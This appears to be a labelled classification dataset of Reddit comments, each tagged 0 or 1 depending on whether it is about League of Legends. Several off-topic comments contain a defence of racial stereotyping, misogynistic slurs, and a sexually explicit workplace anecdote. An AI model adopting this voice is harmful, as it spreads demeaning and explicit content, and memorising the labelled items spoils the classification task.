0	Depends on what you are focusing on. It's called stereotyping. If he sees a young black male with a hoody over his head he said he gets scared. Is it wrong to think this even though there are incidents that make this scenario true? I don't think so. Is it offensive? Yes to the majority of black males who are amazing citizens and have no reason for someone to fear them. But is it rational and safe to assume the worst? Yep.   What about the white dude with his face tatted up? Do I think it possible that the dude could be an amazingly religious, conservative individual and that he wants nothing more than to simply pass by and nothing to do with me? Sure...   The point is that we spend our entire lives stereotyping everything. From what a hamburger tastes like to what a rap musician looks like to how sane homeless people are.   The fact that he said a black kid in a hoodie and the white dude was tatted up had nothing to do with the degree in which each race has to go to be considered dangerous. If you see a white male in a gang-themed outfit you're going to go to the other side of the road as well.   It is and remains that the fact of the matter is that we as a human race are very shallow and our first impressions come from our sight. If we see something that looks dangerous, we're going to avoid it.
1	We're setting the new standard for legendary skins.   Now, magnificent twisted fate and friends aren't the only out-of-date legendary skins. Ezreal will be the  only  champion with a  real  legendary skin. And from now on, the legendary skins will cost 3250.   We're not going back and fixing the past "legendary" skins.   Meanwhile, there won't be any problem with Riot keeping MTF at 1820, because, whatever, it's not even the legendary price point. People who bought him thinking, "this is it. This is the premier TF skin," well, they were wrong. It frankly isn't worth 975 by modern skin standards.   And we have 975 skins that barely hit the threshold for a 520 rp skin. And we have champions who don't have any skins that really hit that 975 value mark. They're retiring a lot of skins, and that works for the global increase in quality, but pushes forward the global increase in prices even faster. PFE costs 3250? Well, shit, there are champs who don't have skins worth a sixth of that.   This only contributes to skin inequality.   Who is going to get the love, going forward from here? Teemo will get some. Kennen will get some. Cho'Gath will get some -- even though, by the old standard, gentleman Cho'Gath was the nicest skin you could ever want for your champion, it is now second-tier, so he needs a new one, and it won't be too hard for Riot to come up with it. But... Champions like Cass, who have gone without for so long, and who Riot can't seem to come up with anything for... If they get a 3250, it'll be the only skin they do get.   And if you haven't noticed, there are some champions who don't have 520 RP skins anymore. Quite a few, actually. Some skins suck. Some champions, like Teemo, have tons of nice middle-of-the-line skins. Some champions, like Ez, have one nice one. And some, like Twisted Fate, it seems, will always have a wide variety of underwhelming skins, half of which are overpriced.
1	I played a rank where 2 people on their team dropped immediately. Thought it was a free win because both our enemy bot lane were afk, but this nidalee comes to our lane mid-game (first time really interacting with us) and she is soooooo fed. I was so confused. I just assumed that she was just that good. Didn't think twice about it.   Later in the game I was only one at our base while our team was pushing their inhib. I go to grab jungle monsters on our side and see nidalee running towards a bush. I assumed she was going to go and B so that she can defend inhib. I ran in RIGHT after she went in and she was gone. I said over my mic   "Damn where the hell did she go???"   "Who?"   "The nidalee"   "... what do you mean? I am fighting her"   Sure enough she is back at her base defending the inhib... sucessfully I might add. I haven't heard of Nid teleporting THAT far before... but I swear to god, I was chasing her and then she was at her own base within seconds. For all I know it was one bug and we were just that bad, but it was just odd.
1	The main problem I think for CLG that has existed for a  really long time now, is they rely on their bot lane a lot. I've never seen a single game where they gained momentum in their mid lane or top lane to push and win the game. I think link is starting to play like shiphtur 2.0, he doesn't have an impact on the game when they are losing. He never snowballs leads in his lanes. Same with Seraph, he never gets leads or carries team ( you can still carry on a tank/support top by being ahead in items etc). I just don't see top and mid lane impacting the game as much as they should be, compared to other teams. I think the onus is on Link and Seraph to make an impact, get ahead and to create pressure. Link should try to play champions like syndra, zed, ahri and try to make picks and snowball games. I also see the CLG strats being very poor and bland. Curse pulls out a splitpush comp for their first game in a series. As far as I can remember CLG has never run a splitpush comp because they are really scared. they try to copy everything from korea, but the fact of the matter is. They are not ready to play at that level. They are trying to play super team fighting comps where whole team is built around getting doublelift to carry. Curse just abused this fact. They kill doublelift and the team fight is over. on the otherhand every member of curse is a threat that clg had to worry about. But for curse they just had to worry about doublelift, rest of the team is non existent.   I am a CLG and CRS fan. I change flair to support curse through playoffs. :)
1	The meta used to be 2 top, 1 mid, and 2 bottom, with some roam. Then people discovered some champs could survive in the jungle at level 1, and Riot liked this. Season 1 Championship, European teams were the first to introduce the adc/support bot lane, which was quickly proven as the best. That's sort of the
1	I humbly disagree with your opinion on this somewhat.   Karma might not have her heal and she might be less useful as a support than before her rework, but her shield provides a movement speed boost and, with Mantra, does damage and shields all nearby allies.   Inner Flame does damage and slows in an area, though it can be blocked by minions and depends heavily on her positioning. Soulflare leaves a slowing area, as a plus.   I have to admit Focused Resolved is quite underwhelming, but the root does alright for saving her partner and, with Mantra, provides some sustain.   As for Lux, I agree with you that she is best as an AP support and I won't argue with that, but my main point here is that they'd be great partners throughout the game, whether it be laning, ganking or teamfights. They're both great hybrids of the two roles, and it makes some sense that they'd work well together.
1	I think instead of viable or not viable people should lean towards using competetive or non-competetive.   Any champion is viable so long as you're able to get into game with them.  With enough farm, an AD Annie can rip through an enemy team, it's just that you wouldn't win your lane against someone of equal skill as you whilst playing as AD Annie, making her viable but non-competetive.
1	I don't think Riot will remove them and disagree that they are "bullshit," and here is why:   Yellow Trinket : 1 free ward that lasts for 60 seconds. Besides its obvious uses, this is at least be good for those who think that they are better than wards and refuse to buy them, at least they will be outputting some vision. This is also good on champions such as Katarina and Lee Sin who can make full use of ward jumping. Also, the upgrade allows for a pink ward, so those who are reluctant to ward can do more by denying enemies vision.   Blue Trinket : A free Clairvoyance of sorts, this is good for supports to take to get vision of enemies coming in for ganks/enemy buffs. Supports would take this over the Yellow Trinket because their ADC would take Yellow Trinket and with their improved cashflow they would be able to simply buy their 3 wards.   Red Trinket : A free version to the late Oracles Elixir (RIP in peace sweet prince)  this is good for Junglers to take in order to disable vision. Ranged Junglers with the  Scout  mastery (15% improved range on Trinkets) can disable and clear a ward without ever even entering vision, so if you know where the ward is, it is possible for you to gank completely undetected against people who don't pay attention to their ward timers.   *The above are just examples of the uses of the Trinkets, I am sure more will crop up as people grow more accustomed to them.
1	I main support too, and I'm in Platinum now. My technique is that I will snowball my lane by winning hard, getting early kills before the enemy jungler comes and without our own jungler, so the jungler can help mid and top instead. Right after the enemy tower goes down, I would shoot straight to top or mid to gank, and get a couple of kills there.   Dominating early dragons will help your WHOLE team too, so they don't have to rage after feeding, and they can accept that they will get carried by you.
0	Holey Smokin' PEaches!!   [When You Can Kill in Texas](     On Christmas Eve in 2009, Ezekiel Gilbert paid an escort he found on Craigslist $150 for what he thought would be sex. Instead, according to the San Antonio Express-News, 23-year-old Lenora Frago left his apartment after about 20 minutes without consummating the act. Gilbert, now 30, followed her to a car with a gun and shot her in the neck through the passenger-side window. Frago became paralyzed, and died about seven months later. Gilbert admitted to shooting her but contended that he did not intend to kill.   Gilbert was tried for murder. Last Wednesday, a Texas jury ruled that his actions were legal. Thats because Texas penal code contains an unusual provision that grants citizens the right to use deadly force to prevent someone who is fleeing immediately after committing burglary, robbery, aggravated robbery, or theft during the nighttime from escaping with the property.
0	My uncle likes to tell the story of how he ran from the cops once. Maybe he'd had a bit to drink, maybe he was speeding. Either way, he wanted to avoid the stop at all costs.   There was speeding. There was reckless driving. And then there was a school zone, and my uncle... stopped. Pulled over and let the cop come up to him.   Of course, the officer was... not pleased. First he asked why my uncle had run. No particular reason, of course. The the cop asks why my uncle had stopped. "You were way ahead, I was about to call off pursuit!" My uncle explains the school zone, how endangering kids wasn't worth the getaway.   Cop runs his name, finds no warrants, writes him a minor speeding ticket and sends him on his way.
1	Alot of people seemed to get bored by Monte defending himself. Although I think he took too much time defending himself, I totally understand that he wanted to. Because if someone with a pretty decent following (Reginald) just 'spews garbage' on your persona or your profession most humans would feel insulted. I also think that alot of people just can't separate the two things that are going on right now:   1)  Monte is a coach is partially responsible for the recent clg results and therefore his position should be evaluated after the season.  This point is completely valid. There have been things going wrong in the clg camp. He always said his remote coaching wasn't ideal, and he also admits being responsible for the recent results. We will probably hear about the consequences after the season is completely over.   2)  Monte does nothing. He doesn't coach, he only talks shit.   I can't believe not more people stand up for him in this case. This just feels so wrong. I personally don't feel like he's that trash talky at all, but I guess you can have different opinions on that. But then still I feel like that shouldn't have anything to do with him as a coach for clg. When people say things like 'Well if you talk shit, you can get shit', that doesn't mean you can just go around and spout garbage. If Monte talks shit (which I think is pretty limited, or might not be qualified as trash talk by all) it usually is based on statistics (like voyboy being middle of the pack, amazing's small champion pool, LMQ scrims). Sure he makes mistake and analyze things the wrong way, or misses out on a upward swing of teams he previously down talked. But he's in no way as malicious or as evil as some people make it out to be.
1	People have been saying this for like 5 months now... So there's that.   Besides he's not really toxic, he's not as salty as people say, it's just that the main part of reddit lacks a skill called "Social intellegence and experience". Like, Hotshot is like 10x worse when it comes to flame, and he does it in chat as well, and the dude is more salty than a 40$ meal from McDonald's. but it's cool when he does it because he's Hotshot. Like seriously, Bjergsen seems like a nice guy. But when you spend  70% of your time on league, and reddit, youre not gonna know what a real douchebag would look like.   Also: The reason Bjergsen was humble in EU is because he had the same confidence as an autistic carrot. If you wan't him to be like that again, or feel like that again, you're more toxic than any pro player.
0	My point is though that it is not as bad as many say because it doesn't build up as CH4, it builds up as CO2, which has 4% if the potential of methane.  There are a lot of other sources (that produce far more CO2) that you are completely ignoring.   EDIT:
1	Vayne . People say she's weak early game. She's  fragile  early game, but she still has an above-average damage output. I'm convinced that Vayne players are behind the myth that she's weak and easily ganked, because every time she's in a game both junglers spend a lot of time bot. She has tons of outplay potential, and she only needs to be better than one or two players on our team to get fed off them. When I'm winning the lane her jungler comes to help, she flash-stuns my support for an easy kill, I get dived 3v1, and they take bot turret and dragon. When I'm losing the lane our jungler comes to help, gets between Vayne and a wall, and feeds her double buffs (sometimes she keeps going, gets the double or triple, and proceeds to take tower and dragon). When the lane's even, she lets us take tower and afk farms while everyone else groups mid - until my team decides she needs to die and sends two or three people to kill her. This inevitably results in at least one kill for her, more if she sticks around after the first. Even if we succeed in killing her, she ends up with more gold, and that's not even considering all the minions she farmed before we got there. If she understands how to play the champion, she  will  get fed one way or another.   If I'm playing jungle or a solo lane, I'll try to help. I'll take Teleport, roam, gank, do anything I can to shut her down. Doesn't matter. I've seen a 0/8 Vayne win a 1v2 against a well-farmed Lissandra and a Riven with double-digit kills. I've only ever won two games against Vayne; one was a blind pick game where both teams had Vayne and ours got 10 kills in lane, the other was against a first-time Vayne with AP runes/masteries that started boots 3, used E on cooldown to harass in lane, and had an Alistar support who failed every single W-Q combo.
0	Seeing this is making me livid. My ex girlfriend of two years did this with all her boyfriends. Bitch lied to me when we broke up too, saying no one else was involved. 4 months later, she emails me this sappy shit saying how she was glad we met and wanted to be friends and all his stuff. Decide to check her Facebook out.   She got in a new relationship THE MOTHER FUCKING DAY SHE DUMPED ME. Fucking cunt. I had never been filled with such rage. I told her that morally, I could not communicate with a human being who was a pathological liar (white lies the entire relationship, had some big lies too. Would lie about what she was doing) ad someone who treats me with no respect as a human. I promptly told her to fuck off, never contact me again, and then blocked her.   My life is so much better now. Fuck the girl you know from work. If you know her boyfriend, tell him. He'll thank you down the road for the info.
1	CLG will go 0-3 and liftlift will be replaced by Choax after the second game, with Hotshotgg moving from Top lane, to Mid lane, to ADC by the third game. Aphromoo will have plenty of presence in the lane by playing Leona in every game and continually feeding the ADC double kills only to have the ADC get blown up by season 3 strats left exposed by archaic season 2 mechanics from CLG. After the game BigFatLP will give an interview in which he officially announces that EG has returned as CLG.EU and the entire TPA lineup will be subbing for CLG.NA in the next week of the NA LCS. Meanwhile CLG's website will go down and come back up as a preview website for "The Next Big Thing in MOBA Gaming, Counter Intuitive Gaming" with a JPG of Xpeke's Kassadin backdooring for the win.
1	I don't have any objection to having people take kills I would be confident I could get at the time, so long as the team gets it I am fine with it. Having said this I always make sure to say 'Sorry for ks' If it is very obvious that I have done the killing blow on an enemy that a team mate would have got even if I wasn't there because they simply deserve the recognition that they put the effort in. Be that as it may about 2 days ago I was playing as Xerath in mid now as many other Xerath players will tell you he a lot of damage and a fair amount of utility with his range but he is not really a mage duelist unlike champions such as Ahri, Vladamir or Kennen (to name a few) In this game we had a jungle Hecarim who was nearing legendary and myself and him found ourselves in mid lane agaist 3-4 if I remember correctly we had great poke and slowly drained their health but my Hecarim was low himself so Each time one of them jumped him I did my combo and managed to fend them off to the point where it was time for me to clean up as he went to recall but when I tried to he just kept coming back with his E and dealing the killing blow to the point where I said to him 'come on man at least let me have one don't KS like that' he ignored me and recalled, this frustrated me because he was legendary and I was on about 5 kills or so and I felt like my hard work was just not being appreciated and in the lobby when I said (in a jokey way) 'Hecarim why did you ks so much?' and he replied 'stop cry kid its game' This really wound me up because you bust your ass to help your team and they thank you like that so yeah KS'ing can be frustrating at times.
0	We are supposed to have freedom of speech in this country. While it is not against the law for companies to fire someone based on their opinions, it still violates the spirit of the first amendment when someone is coerced rather than persuaded away from an opinion.   I do not believe people should be fired for their opinions unless they express themselves in a way that would make a reasonable person think they intend to carry out violence. But here, the opinion isn't the issue, but the aggression. The OP would have been right at home in Germany before the wall came down, or before the swastikas were torn down.
1	he has not corrected his behavior from previous times he has broken the summoners code and put "on trial" for breaking his "parole".   How do you know he "didnt correct his behaviour"? In that case, he disconnected from a game for 15 MINUTES, a 15 minutes disconnect = permaban?   It could be for any reason, his family having urgent issues, his computer dying, whatsoever   >
0	Here's the deal with lifting and grunting. There is a difference between struggling because you're pushing yourself, and just making noise to draw attention and feed off your own testosterone. Most gyms have a couple of guys that act like they're making angry love to the weights. It's not everyone who grunts or drops weights, it's a rare few. Most people conduct themselves with class and are simply trying to get fit and it's most always obvious. However, there are those douches who do make a spectacle of their work out. You will know that's going down by the amount of rolled eyes and cringed faces you see on the by standards, trying not to be distracted by those raging (likely steroid induced) ultra masculine amateur bodybuilders hoping to distract from their small penises.
1	Gonna have to very much agree with Destiny on this one. He didn't ask for anyone to do anything towards Own3d.tv in his thread. All he did was post a cited page detailing how he wasn't paid for the work he did while in service of the streaming provider.   The fact that "Witch hunting" and "pitchforks" appeared in the thread is a result of other people, not Destiny himself. The correct response for the mods would be to actively watch the post, and delete anything that would be taken as "Witch hunting" (If you really want to delete anything at all).   I understand the desire to keep people from being doxxd, but this is a case where Destiny wasn't paid for months of work by a well-known streaming service, and he wanted all of /r/League to know about it. I imagine his motives were as simple as "Look at how awful these guys are screwing us!"   The people at own3d.tv are going to be harassed, one way or another. Probably more-so with the removal of Destiny's post, because now everyone who has been riled up has a reason to think that the Moderator's are defending own3d. If the fire gets bigger than it was before, it's on your heads.   In conclusion, i sincerely believe the mods made the wrong choice here. Not only does the /r/League community now have a "witch hunt" for own3d.tv, a few bad apples now have one for the Moderators of this subreddit. It wasn't a tactful move to broad-stroke the delete brush on the entire thread, because now its another problem completely.
0	That's fair.  I'm overgeneralizing and unfairly homogenizing.  When we talk about generations as if they're a corporate entity, it's hard to avoid.   And you're right, we should be trying to help and change things, not just bitching and moaning.  Casting blame isn't going to change things.   But I do think it's fair to criticize the decision to be short-sighted with investments.  In part because seeing those decisions as failures will help us commit to making the decisions now that we should have been making all along.   And it's not wrong to observe that these past failures are falling disproportionately on Millenials, particularly since our opportunity costs and late-start costs are so egregious.  We deserve something for shouldering that burden.  Whether that is student loan forgiveness, inflationary monetary and fiscal policy, just some credit and patience or something else, I'm not prepared to say.  I guess I would like it if older generations would get out of the way and start helping if we want to change the economic system.   One further quibble: if you think that everyone had a fine chance in the past, I think you're mistaken.  Detroit has been suffering sky-high unemployment for a long time.  Sure, some people might have moved to another state with growing numbers of low-wage jobs (e.g. the south), but those who are in trouble now could always move to an English-speaking part of Africa or India with a growing economy.   Also: I don't know what you mean by "noise".  Sorry.
0	Break up with you or lose weight is a pretty assholish way about doing it, no. Calling a spade a spade is all fine and dandy but calling an asshole an asshole is just as fine.
0	In my Junior year of high school, we had this really terrible Chemistry teacher. Now, he was a brilliant man, very smart, but he did NOT know how to teach his class. His teaching methods consisted of belittling us students and making us feel like we were absolutely stupid and useless for not knowing the content of what we were learning. He would often openly call us stupid and has made many girls extremely uncomfortable in his class because of his perverse nature.   One day, we were taking a quiz. The class rules stated that you could have your phone out after you finished with the quiz, as long as the volume was off and it wasn't distracting the other quiz takers.   I had finished, along with most of the class, and was surfing twitter on my ipod. My best friend, who sat behind me, had also finished and she was reading a book on her iPhone.   As I was scrolling through twitter, I saw one of her posts and decided to favorite it, but once I had, her phone made a loud DING. She quickly apologized for it and muted it, but the teacher was not pleased. He told her to take it to the front of the room and to place it on his desk, and that she would be able to pick it up after class. When she refused, he quickly got angry at her, shouting obscenities and spewing lies about how she was an awful student who never listened. I, being a fiercely loyal friend, was not going to have any of that shit being said about my friend. I looked at him and said in that angry calm tone that your mom would sometimes get, "Mr.blank, that's uncalled for. Though she may not be the best student, you have no right to say those things about her in front of the class."   His jaw dropped, then he turned to me, however, since that was one of my good years, he had nothing to say about me and quickly realized that the entire class knew that he had dug himself deep in this one.   After the class was finished, he called my friend and I to his desk, then took us into the chemical storage closet and tried to apologize to us, though truth be told, his job was on the line and all he needed was one more complaint to end his career.
1	For everyone who is supporting Riot's "no sound-booth" thing because "they use soundproof headphones"...you're missing the damn point.   We all know how the soundproof headphones work. They pick up incoming sounds and then send out an inverted frequency to negate it. That way players don't hear the crowd through the headphones.   However, you're missing the point that THE MICROPHONES ARE NOT SOUNDPROOF.   Starcraft pros and LoL pros have complained about not being able to hear ANYTHING when the crowd is cheering REALLY REALLY LOUDLY. It doesn't matter if the headphones are soundproof when there's a raging shitstorm of noise funneling up your microphone and into your voice comms from the crowd.   What do sound booths do? Sure, in terms of blocking out noise reaching the ears, they may not even be as effective as soundproof headphones because they don't send out inverted sound waves to effectively negate near 100% of the noise. But they sure as hell block a shit ton of noise from ever reaching the players' microphones. The two tackle very different things.   You'll notice in OGN, some players don't even wear the headphones. The sound booths work well enough that they can use their own stick-in earphones and use the headsets simply for the microphone only.   I absolutely do not understand why anyone would oppose soundbooths. The "crowd interaction" is unimportant when weighed against protecting the integrity of such a complex game. It's an E-Sport, not a physical sport like football or basketball. We should aim to have similar competing structures as them, but not everything must be the same. The crowd interaction isn't worth jack shit when the game is ruined by screaming and shouting.   You can see even in Korea, with soundbooths, the game is pretty damn popular. There are people filling up the studio all the time. Is Riot still under the illusion that they need to compromise the integrity of the game for this supposed much-important "crowd interaction"?? So damn delusional, and anyone who subscribes to the idea as well.
0	Or you'll have an experience like mine... went in for an alignment, left with a car out of alignment. Went back in, got car back with damaged rim. I watched my dash cam, the 'tech' drove my car up to a curb, and turned the wheel into the curb 7x and said "I don't give a fuck." Then went back and told the guys that were going to do the alignment that it was dead-on. Contacted the dealer, sent them a link to the YouTube video. They agreed to have my rim repaired by a third party and returned to me, and pay for an alignment at another dealer not affiliated with theirs. Then their 'legal council' reported me for "eavesdropping." DA dropped it after I spoke with the detective 4x in a day. I'm forfeiting my last 2 free oil changes.
1	Years of terrible solo queue experience here in d3-4, let me try and shed some light on this.   Baron is a really dangerous objective to do. It requires that everyone be on the same page. People often have different views on how to handle a baron situation.   For example if 4 people are killing baron and the enemy jungler flashes in to try to steal at 3k HP on the baron the correct move would be to instantly turn on the jungler and kill him to not risk the steal, but others will often panic and continue to attack the baron and then you don't get the kill nor the baron.   Also, baron works with certain compositions. If the enemy team has good ad waveclear and/or you have bad seige a baron buff won't do much other than giving you a temporary stat boost that you'll lose after they turtle for 3 minutes. A dragon helps push the game to end because a 5 dragon team usually can simply tower dive 5v5 and still win. An inhibitor would give super minions and allow you to seige 5v5 by rotating to another part of the map.
1	Midlane matchups are overhyped imo.   The vast majority of them usually end up with both laners passive farming into teamfighting later or there being 3-4 man gank squads mid, so really, it's not like I'm expecting something major here to be honest.   The same thing happened in Worlds of seasons past. Sure, you'd get your occasional 1v1 duels like Cool v. Faker in S3, but the majority of any "flashiness" happened post-laning. Everyone expecting solo-kills like candy in laning phase between mid-laners isn't really going to get what they think they're going to see.   I'm pretty certain, in fact, that the only real discrepancy that's going to show is CS advantages, which even then, will likely probably be something minor within the realm of ~15 cs between laners.
0	No way man. Pant-boner happens ALL the time to me in meetings. I'm in my early 20s so I kind of dong like the "mom fat" that women get toward 30, but lem me tell you what! Sitting in the meeting, jabbering about databases, and this broad peeps my pants-boner, i catch her, but she does't notice. This happens a few times throughout the meeting when i lean back in my chair. Now this girl is a mom, but she has an UNRESISTABLE voice and eyes. I swear tits are great but eyes and voice really do it! Anyway after the meeting she asks me to come to my office (in person, don't want that email on company servers), to which I oblige. When I enter, I notice music playing louder than usual in the office. She shuts the door. It's about 11 o'clock, and most people are about to leave for lunch. She doean't say much, just makes small talk about the meeting. Next thing I know, they're out. Her big pillow twins are...just out and she stares at me. She approaches me without a word, begins to undo my pants, and says "Go". I see some lotion on her desk so I decide to apply it to those wonderful Milk Wagons, and begin working my way to giving her a little shower with the tallywacker waxing those sweater kittens.
0	Ok, here's the thing. In our population, some people are just dicks. Straight up dicks. Some of them believe in Yahweh, some in Allah, some in nothing at all, but they all have one thing in common... they're dicks. They never make up the majority of the group they represent, but they sure yell louder than everyone else, like a dick.
1	my elo is around 1100, but i carried myself out of 900 by doing a few simple things. I'm not sure what you mean by ELO hell, but if you're around 900-1000. this might help you a little bit. Otherwise, disregard and acquire currency.   Gank all the time. Don't stop ganking. Amumu i think is a fairly weak jungle for lower elo's because of how unreliable your team is. You want to pick a jungler who can do it all, and isn't too reliant on landing skill shots, and just be godly.   I've had success with Mundo, and Udyr mostly. I'm willing to bet the same would apply to Skarner as well. They're junglers that don't necessarily NEED too much to successfully gank. Once Skarner hits 6, every gank is going to be a kill. Also if you build damage on them, they can carry games well enough.   So far in my last couple games as jungler, the only time i lost was when i decided to play Nocturne, all lanes lost, and we had a trolling support. Some games you just won't be able to win.   But all in all, with easy junglers where there is no margin for error, it's fairly easy to carry games. As Udyr my last couple games i went 13-0-9, 3-0-14 and 4-1-9. My elo would probably be higher but i just can't stand all the complaining people do in the lobby before the game even starts. One more edit: Duo queuing with a reliable friend also helps, it's good to know you have someone you can count on!
1	Some months ago I played in a qualifier for one of the bigger 'local' tournaments organised so far. The team we played against had a full AD / bruiser team composition (I think they even had J4 support, but I'm pretty hazy on all the details anyway). Some bans were targeted against us and picks counters for what we usually picked, so we were grasping at straws every time it was our turn to pick a champ.   One of us jokingly remarked "they are all AD, we should pick Rammus" and then it dawned on us that he's actually a good choice all things considered. We couldn't squeeze him into the jungle since our jungler wasn't confident in his Rammus skills so our top laner (who used to be our jungler in S2) picked him top lane against Zed.   He then proceeded to absolutely  demolish  Zed in lane.   We couldn't stop laughing. It was actually unbelievable. Every time he forced Zed to go back or killed him, he'd just powerball over to mid and secure a kill by taunting their mid laner. He was virtually untouchable throughout the match and definitely carried us to victory.
1	COROLLARY TO YOUR BOOT COMMENT:   CDR boots are debatably better on some mages, as many of them benefit more from CDR effects. by and large these are less the carries and more the supports, although there are exceptions (hint hint ryze)   For kennen, you probably want sorc boots though, as you're much more capped by your energy regen than your cooldowns per se.   However, all of this discussion is moot when we consider that  every  build should include tenacity, or at least make note of "boot options: mercs/other boot."
0	Is it so hard to scroll down first to see if there is a
0	That kind of reminds me of the first time I was in the OP's situation as the customer.  I was in some store early in the morning (maybe Home Depot) and I was buying a $2 item and they ask if I want cash back when I pay with my debit card.  This was way before self swipe was a thing.  I said "yeah, sure how much can I get?"  I knew I needed to hit the ATM anyway so I tried to take the max out hoping to avoid another trip.  The cashier obliged but said they didn't have enough in the till and would have to call over a manager.  I told them not to worry about it and I would just make the extra stop.  I've been slightly more conscious of doing that lately but not much.
1	The donations thing is becoming a big deal in the LoL scene.  People are realizing that there's money to be made from the viewers, whether it's intentionally through donations or unintentionally through watching a stream/ads.  The viewers are currently saturated with the touts that are both pros and non-pros alike.   The pros want donations to fund their trips abroad, but they offer what the LoL community sees as valuable insight into the game (and private lessons).  The visual media people are giving the community something pretty valuable as well (insight into the minds of the players and their reactions outside of the game, top 5 clips), but the community doesn't see that as being enough.   I don't think anyone really minds chipping in for a worthy/good cause (i.e. interesting content, unique interviews, sick fam, etc), but most people are hesitant to donate if they have no idea where this money is going, especially when the product/service being provided doesn't hit beyond that threshold of, "dang, I can't do that".  When a pro goes into his/her insight about why they bought a certain item or picked a certain champ, there's something to be gained from that that is useful and unknown to the viewer before hand.  When a player drinks on a skype call for an hour or two and ad libs hilarious comments, well, I guess that's where LoL viewers draw the line from donate worthy or not.   If I give 10 bucks to protatomonster, since he's raising funds for a sick classmate, how do I know where that money is going?  I have no opinion on protatomonster's integrity, other than he's really consistent with his weekly top 5 plays and I enjoy his commentating style/videos.  That's it.  I don't know if he's in high school or college.  The cynic in me wants to say that he'll be forced to skim off the top because people on reddit (and the Internet in general) love giving to causes and he'll get a lot of money.  Maybe if he gets over a grand, he'll spend a few hundred to upgrade his monitor.  And no matter what he says or does, I don't know.  And it isn't his fault or on him to do anything different.
1	The only champions who should be taking smite top lane have a built in escape i.e. Hecarim, Shyvana and Rek'sai and are good 1v1. Mundo shouldn't take smite as he can't easily push his lane and doesn't have a good escape mechanic other than landing a slow on one enemy. You don't need vision in solo queue if you took the right champion as you shoved top so their top laner needs to CS and you have skirmishers so you should out duel everyone. On top of this you should still have a good escape and a fast clear, plus your solo lane farm. Also as a jungle main it is way more important to let top and/or bot take a camp from my first clear as the lane advantage is way more important than me getting a six camp start. What they should nerf though is a team shares the charges on smite, this way you don't have double smite to take baron and dragon.
0	When I was unbelievably drunk a couple Christmases ago I spewed in my friends bathroom sink (the toilet was occupied and I couldn't wait) I managed to fill the whole sink, which I know I fricking gross but I was kinda proud . . Anyway, in my drunken state I had to put my hand in it to 'unblock' the drain. I cleaned it properly with cleaning products and everything, also my arm. Well, I though I had anyway until I heard them the next day blaming it on Adrian (silly Adrian does stupid things when drunk) I said it was me, apparently it wasn't very clean at all, woops. Cleaning puke with a hangover is just a recipe for more puke. Ugh.
1	It's correct to report them for "unskilled player" if you wish to do so, but as everybody knows "unskilled player" - reports aren't doing anything at all.   You could say that it's not fair towards his teammates to jump right into ranked after 3 weeks break though, but reporting for something like this is rather harsh.
0	I had a friend who was diagnosed with ADD. Really smart kid, wasn't having problems with school or anything. Always had time for his numerous hobbies while doing great on homework. Anyway, he was diagnosed and was skeptical but decided to try the meds and go from there. He likes the extra sharp focus it gives him and now insists he knew he was ADD because he "found background noise distracting."
0	YMMV IYKWIM   FTFY
0	I mean it sucks. Parents definitely should plan ahead and save for your education, but they can't always do that. When it comes to your parents being resentful isn't gonna get you anywhere. Sure she could have done better, I'm sure you coulda done better too. It's easy to forget that your parents aren't really much older than you. Parents are fallible just like children.
1	Because Riot doesn't have to answer to any promises they've made. I think it's rather smart, as a company who is slow on all forms of development, to not make promises as the Compendium does. I feel like if they TOLD people explicitly who/what/when/where/why, they would deliver.   For example, they only say what the next champion is, not when they'll be released. They only say there is a replay system in the works, and try to give a really far off guesstimate (probably in hopes we'd forget.)   Not trying to excuse Riot's downfalls, just pointing out that not every company has to work the same in order to have community acceptance.   Plus, Valve is a much older company than Riot. We're approaching Riot's sixth year(?) as a video game producer. It's hard to get mad at a company which, despite all its money, is yet to find it's footing. I'm pretty sure Riot is moving its HQ into a much bigger, better complex within the next two years or so, probably to expand its departments to improve its efficiency.
0	This is Reddit. I'm not going to proof-read my statements. My bad. Also, there is absolutely nothing wrong with starting a sentence with 'but' unless your in high school English class. Many professional writers do this. I refuse to have a debate with someone that feels that correcting my grammar supports they're argument.   Yes I understand your reference. BUT you can lose a scholarship more easily than a grant. Therefore, if your eligible for grants, it is illogical to desire a scholarship that will add unnecessary stress and hardship to you're life. It's a pretty simple, logical idea that I'm talking about here.
0	Entirely untrue. I have seen runners, singers, actors, athletes, dancers, and all sorts of other people who rely on their bodies and/or their voices for their profession smoke, in addition to those who are otherwise sedentary and unhealthy. Broadly describing smokers in this way is not only unfair, but just incorrect.   The thing about smoking is it's a compulsion. You try it once, and feel fine. You don't feel hooked, so you don't have any reservations about trying it again another time. It doesn't feel like a habit. You're just smoking because it feels good, and you don't think any further about it. Then comes the day when you want a cigarette and can't have one, and all hell breaks loose in your body. You get anxious, sweaty, and fidgety. You get irritable, and claustrophobic. Maybe you even get nauseous. That's when you realize, "Well, shit. I'm addicted to nicotine."   And when you quit, that feeling does not go away. I am an ex-smoker. I got to a point where I would smoke a pack a day every day for three years, and in a few months I'll be marking five years since quitting. That's a big milestone. But every day,  every single day , I get the urge to smoke a cigarette. That's the thing no one tells you: you never stop quitting smoking.
1	I'm sorry but everyone saying C9 is doomed without Hai is delusional. Yes, it is true Hai has godlike shotcalling but clearly, his mechanics and champion pool are lacking and they're not improving.   C9 could bring any midlaner to the team they wanted from the western region, apart from Bjergsen and Febiven since I doubt they'd want to leave their team, especially Bjergsen. Now, C9 could easily grab a midlaner with world class mechanics and teach him how to shotcall. Maybe he'll never reach Hai's shotcalling ability, but it would be more than enough, from what I understand, Lemonnation also did part of the shotcalling.   If you don't believe this, we can just look at TSM. Regi has clearly the heart off TSM but we recognised that the team hit it's peak with him on the team and decided to step down and bring in Bjergsen. Could he shotcall when he first came in? No. Can he now? Yes, perhaps the best shotcaller behing Hai.   If this is true and Hai really is stepping down or getting benched or whatever it is, I'm only surprised that he is moving out. Hai would probably be one of the best coaches in NA in my eyes and could help the new midlaner, if there is one, with shotcalling and to get used to the team environment.
1	good idea, put
0	The problem with filing charges, is somehow when the police arrive the female will twist things so it looks like she is the victim and the male will get arrested instead.   I witnessed this first hand. My friend was being violently assaulted by his girlfriend, yet he didn't fight back, didn't even push her away. There were plenty of witnesses vouching for him, yet when the cops got there, she said he hit her, and he was arrested. He said he didn't want her in his house, cops didn't care, let her stay. She destroyed/stole everything while he was in jail for the night.   Case was thrown out of court.
